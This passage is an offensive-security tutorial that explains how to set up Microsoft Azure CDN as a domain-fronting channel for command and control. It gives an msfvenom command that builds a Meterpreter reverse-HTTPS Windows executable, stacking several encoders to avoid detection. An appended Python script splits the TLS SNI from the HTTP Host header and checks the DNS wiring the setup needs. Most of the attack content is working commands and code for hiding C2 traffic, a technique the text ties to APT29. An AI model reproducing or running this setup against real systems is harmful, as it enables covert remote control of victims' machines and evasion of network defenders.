Using Microsoft Azure for C2

Similar to Amazon CloudFront, Microsoft offers a CDN service through the Azure portal for the same purpose: delivering content to users quickly from edge nodes. Azure CDN uses the Verizon and Akamai networks to deliver that content.

In this example, we will use a different technique to perform domain fronting over SSL/TLS, using Microsoft Azure CDN and Metasploit.

In order to set up a Microsoft Azure CDN, follow these steps:

  1. Log in to the Microsoft Azure portal at https://portal.azure.com/.
  2. Search for CDN, and create a new profile by clicking Add.
  3. Provide a name for your CDN profile, and select the Subscription, Resource Group, Region, and Pricing Tier (most of the time, the lowest tier will be sufficient). Tick Create a new CDN endpoint now.
  4. Provide the CDN endpoint name and Origin type (we chose Custom origin), and click Create. It can take up to two hours for the endpoint to propagate throughout the CDN, as shown in the following screenshot:

  5. While you wait for the endpoint to come up, set the caching rule for query strings to Bypass caching for query strings. A real CDN caches content; we use it only as a communication channel, so C2 traffic must never be served from the cache.
  6. That should create a new CDN profile, and you should be able to see the hacker-controlled domain and the Azure CDN endpoint, as shown in the following screenshot. In our case, mastering.cyberhia.com is the hacker-controlled site (the origin), and masteringkali.azureedge.net is the CDN endpoint, which supports both HTTP and HTTPS (as we chose Custom origin):

We will create a Metasploit Meterpreter reverse HTTPS payload with msfvenom. LHOST is the fronted domain (the hostname the implant resolves and places in the TLS SNI, which the CDN also serves), while the HttpHostHeader option injects our CDN endpoint into the HTTP Host header, so the CDN forwards the request to our origin:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https lhost=<VULNERABLEHOST> lport=443 httphostheader=masteringkali.azureedge.net -e x86/shikata_ga_nai -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/bloxor -i 9 -f exe -o /root/chap13/azure.exe

The first stage must emit the payload as raw bytes (-f raw); the second and third msfvenom invocations read that raw payload from standard input, re-encode it, and the final one writes a Windows executable.

Executing this payload should return a reverse shell to the C2 server sitting behind the Microsoft Azure CDN. This technique was actively used by APT29 (a Russian state-sponsored group) to hide its C2 traffic.

Testers need to ensure that the origin domain behind either Azure or Amazon has a valid A record, or the CDN cannot reach the C2 server. For Microsoft Azure, you also need to ensure that any custom domain is CNAMEd to the correct CDN endpoint for domain fronting to work.
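The following is an added example, not code from the book or from Metasploit. It shows on the wire what the HttpHostHeader option above does (TLS SNI carries the front domain, the HTTP Host header carries the CDN endpoint) and performs the DNS checks just described before you burn a payload on a misconfigured endpoint. FRONT_DOMAIN and c2.example.com are hypothetical placeholders; the endpoint and origin names are the ones used in the text, and the sample zone data is constructed so the checks run offline. A real run needs a resolver that can answer CNAME queries (for example a wrapper around dig or dnspython), which the standard library cannot do.

```python
import socket
import ssl
from typing import Callable, Dict, List, Optional, Tuple

# Placeholders (assumptions, not from the text): FRONT_DOMAIN is a high-reputation
# hostname served by the same CDN; ENDPOINT and ORIGIN come from the text.
FRONT_DOMAIN = "front.example.net"
ENDPOINT = "masteringkali.azureedge.net"
ORIGIN = "mastering.cyberhia.com"

Resolver = Callable[[str, str], List[str]]  # resolve(name, rtype) -> record data


def build_fronted_request(host_header: str, path: str = "/", method: str = "GET") -> bytes:
    """Raw HTTP/1.1 request whose Host header names the CDN endpoint.

    This is what Meterpreter's HttpHostHeader option puts on the wire: the TLS
    layer (SNI, certificate) sees the front domain, the HTTP layer sees this.
    """
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode("ascii")


def parse_status(response: bytes) -> int:
    """Return the HTTP status code from a raw response such as b'HTTP/1.1 200 OK...'."""
    status_line = response.split(b"\r\n", 1)[0]
    return int(status_line.split(b" ")[1])


def fronted_get(front_domain: str, host_header: str, path: str = "/",
                port: int = 443, timeout: float = 10.0) -> Tuple[int, bytes]:
    """TLS to front_domain (SNI = front_domain), then request host_header over it.

    The CDN terminates TLS for the front domain and routes on the Host header,
    so the request reaches the origin behind host_header. Requires network access.
    """
    ctx = ssl.create_default_context()
    with socket.create_connection((front_domain, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=front_domain) as tls:
            tls.sendall(build_fronted_request(host_header, path))
            chunks = []
            while True:
                data = tls.recv(4096)
                if not data:
                    break
                chunks.append(data)
    response = b"".join(chunks)
    return parse_status(response), response


def check_dns_wiring(origin: str, endpoint: str, resolve: Resolver,
                     custom_domain: Optional[str] = None) -> List[str]:
    """Return the problems found with the records the text says must exist ([] == OK)."""
    problems: List[str] = []
    if not resolve(origin, "A"):
        problems.append(f"origin {origin} has no A record, the CDN cannot fetch from it")
    if not (resolve(endpoint, "A") or resolve(endpoint, "CNAME")):
        problems.append(f"endpoint {endpoint} does not resolve yet (propagation can take up to two hours)")
    if custom_domain:
        targets = [t.rstrip(".").lower() for t in resolve(custom_domain, "CNAME")]
        if endpoint.lower() not in targets:
            problems.append(f"{custom_domain} is not a CNAME to {endpoint}")
    return problems


# Constructed sample zone data (not real records) so the check runs offline.
SAMPLE_ZONE: Dict[Tuple[str, str], List[str]] = {
    (ORIGIN, "A"): ["203.0.113.10"],
    (ENDPOINT, "A"): ["192.0.2.44"],
    ("c2.example.com", "CNAME"): [ENDPOINT + "."],
}


def sample_resolve(name: str, rtype: str) -> List[str]:
    """Offline resolver backed by SAMPLE_ZONE; swap in a dig/dnspython wrapper for real checks."""
    return SAMPLE_ZONE.get((name.lower(), rtype), [])


if __name__ == "__main__":
    print("problems:", check_dns_wiring(ORIGIN, ENDPOINT, sample_resolve, custom_domain="c2.example.com"))
    # Live check once the endpoint has propagated (needs network and a real front domain):
    # status, _ = fronted_get(FRONT_DOMAIN, ENDPOINT)
```

Run the DNS check first; an empty list means the origin is reachable by the CDN and the custom domain points at the endpoint. Only then try fronted_get, which should return the origin's response even though the TLS handshake, certificate and DNS lookup all involved the front domain only.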
